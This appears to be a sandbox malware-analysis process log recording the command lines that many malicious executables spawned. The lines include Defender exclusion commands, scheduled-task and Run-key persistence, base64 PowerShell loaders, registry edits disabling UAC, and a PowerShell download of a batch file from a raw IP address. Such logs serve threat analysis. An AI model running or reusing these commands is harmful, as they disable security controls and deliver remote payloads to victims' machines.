C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\grjujyNaBLaKbU.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\Admin\AppData\Local\Temp\tmp283A.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4868
-
-
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"4⤵
- Executes dropped EXE
PID:1508
-
-
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3756
-
-
-
C:\Users\Admin\Desktop\Files\stail.exe"C:\Users\Admin\Desktop\Files\stail.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp"C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp" /SL5="$60576,3881966,54272,C:\Users\Admin\Desktop\Files\stail.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1672 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause lerry_video_112615⤵PID:4692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause lerry_video_112616⤵PID:3716
-
-
-
C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe"C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe" -i5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2372
-
-
-
-
C:\Users\Admin\Desktop\Files\windowsexecutable.exe"C:\Users\Admin\Desktop\Files\windowsexecutable.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3376
-
-
C:\Users\Admin\Desktop\Files\Client_protected.exe"C:\Users\Admin\Desktop\Files\Client_protected.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3084 -s 14084⤵
- Program crash
PID:3092
-
-
-
C:\Users\Admin\Desktop\Files\xxz.exe"C:\Users\Admin\Desktop\Files\xxz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1724
-
-
C:\Users\Admin\Desktop\Files\taskhost.exe"C:\Users\Admin\Desktop\Files\taskhost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\taskhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3340
-
-
-
C:\Users\Admin\Desktop\Files\LoadNew.exe"C:\Users\Admin\Desktop\Files\LoadNew.exe"3⤵
- Executes dropped EXE
PID:5900
-
-
C:\Users\Admin\Desktop\Files\OneDrive.exe"C:\Users\Admin\Desktop\Files\OneDrive.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:5144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAZABvAGMAdQBtAGUAbgB0AHMAXABPAG4AZQBEAHIAaQB2AGUALgBlAHgAZQA=4⤵PID:6388
-
-
C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe"C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe"4⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:5920 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:1532
-
-
-
C:\Users\Admin\AppData\Local\Temp\iazsfn.exe"C:\Users\Admin\AppData\Local\Temp\iazsfn.exe"4⤵
- Checks computer location settings
PID:6044 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs"5⤵
- Checks computer location settings
- Modifies registry class
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe"C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" -enc JABLAHgAcAByAGsAdABqAG8AbwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABOAHkAdgBoAHkAeAB2AGsAaQAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEsAeABwAHIAawB0AGoAbwBvACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEwAZQBwAGsAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABOAHkAdgBoAHkAeAB2AGsAaQAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQARABmAGEAdwBuAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAEwAZQBwAGsAbAAgACkAOwAkAEMAYwB5AGMAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABEAGYAYQB3AG4AbwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATgBsAGEAcwB6AGEAcQBoAGQAcQAuAEMAbwBwAHkAVABvACgAIAAkAEMAYwB5AGMAaQAgACkAOwAkAE4AbABhAHMAegBhAHEAaABkAHEALgBDAGwAbwBzAGUAKAApADsAJABEAGYAYQB3AG4AbwAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAEwAZQBwAGsAbAAgAD0AIAAkAEMAYwB5AGMAaQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQATABlAHAAawBsACkAOwAgACQARABqAGkAaABjAGMAaABtAHoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABMAGUAcABrAGwAKQA7ACAAJABKAG4AegBhAHgAagAgAD0AIAAkAEQAagBpAGgAYwBjAGgAbQB6AC4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7ACAAWwBTAHkAcwB0AGUAbQAuAEQAZQBsAGUAZwBhAHQAZQBdADoAOgBDAHIAZQBhAHQAZQBEAGUAbABlAGcAYQB0AGUAKABbAEEAYwB0AGkAbwBuAF0ALAAgACQASgBuAHoAYQB4AGoALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEoAbgB6AGEAeABqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:6512
-
-
-
C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"5⤵PID:5652
-
-
-
-
C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe"C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7024
-
-
-
C:\Users\Admin\Desktop\Files\25072023.exe"C:\Users\Admin\Desktop\Files\25072023.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5724
-
-
C:\Users\Admin\Desktop\Files\PctOccurred.exe"C:\Users\Admin\Desktop\Files\PctOccurred.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit4⤵
- System Location Discovery: System Language Discovery
PID:6716 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6636
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:6284
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6200
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:6248
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1939975⤵PID:4432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "JulieAppMagneticWhenever" Hist5⤵PID:6172
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y5⤵PID:6280
-
-
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pifRestructuring.pif y5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:7132
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:6704
-
-
-
-
C:\Users\Admin\Desktop\Files\crypted8888.exe"C:\Users\Admin\Desktop\Files\crypted8888.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:5648
-
-
-
C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe"C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit4⤵
- System Location Discovery: System Language Discovery
PID:4420 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:7024
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:6764
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6944
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"5⤵PID:7000
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4473315⤵PID:552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "typesfaxincreasecompound" Ensemble5⤵
- System Location Discovery: System Language Discovery
PID:4820
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p5⤵
- System Location Discovery: System Language Discovery
PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pifBuyer.pif p5⤵
- Checks computer location settings
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif" & rd /s /q "C:\ProgramData\AAKJEGCFBGDH" & exit6⤵
- System Location Discovery: System Language Discovery
PID:6972 -
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- Delays execution with timeout.exe
PID:6576
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:6120
-
-
-
-
C:\Users\Admin\Desktop\Files\postbox.exe"C:\Users\Admin\Desktop\Files\postbox.exe"3⤵
- Suspicious use of SetThreadContext
PID:5564 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
- Suspicious use of SetWindowsHookEx
PID:1788
-
-
-
C:\Users\Admin\Desktop\Files\pp.exe"C:\Users\Admin\Desktop\Files\pp.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6508
-
-
C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"C:\Users\Admin\Desktop\Files\5_6190317556063017550.exe"3⤵
- Checks processor information in registry
PID:6764
-
-
C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"3⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:6224 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F99A.tmp\F9AB.tmp\F9AC.bat C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"4⤵PID:6812
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
PID:3656 -
C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE"C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE" goto :target6⤵
- Checks computer location settings
PID:4364 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FCC6.tmp\FCC7.tmp\FCC8.bat C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE goto :target"7⤵PID:6668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:2092
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:4292
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:5908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"8⤵PID:6176
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command9⤵PID:6400
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/8⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb3b3046f8,0x7ffb3b304708,0x7ffb3b3047189⤵PID:6264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:29⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:39⤵PID:2228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:89⤵PID:6420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:19⤵PID:6720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:19⤵PID:6740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4108 /prefetch:19⤵PID:6556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:19⤵PID:6176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:89⤵PID:576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings9⤵
- Drops file in Program Files directory
PID:4968 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x10c,0x254,0x7ff6849c5460,0x7ff6849c5470,0x7ff6849c548010⤵PID:7164
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 /prefetch:89⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:19⤵PID:6028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:19⤵PID:6748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:19⤵PID:6396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:19⤵PID:3092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,2014382943238319920,16044216498022605925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:19⤵PID:7760
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:3816
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5428
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Files\bwapp.exe"C:\Users\Admin\Desktop\Files\bwapp.exe"3⤵
- Adds Run key to start application
PID:3480
-
-
C:\Users\Admin\Desktop\Files\System.exe"C:\Users\Admin\Desktop\Files\System.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6876 -
C:\Users\Admin\Desktop\Files\._cache_System.exe"C:\Users\Admin\Desktop\Files\._cache_System.exe"4⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of SetWindowsHookEx
PID:7028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\._cache_System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:7748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:7872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:7448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:2728
-
-
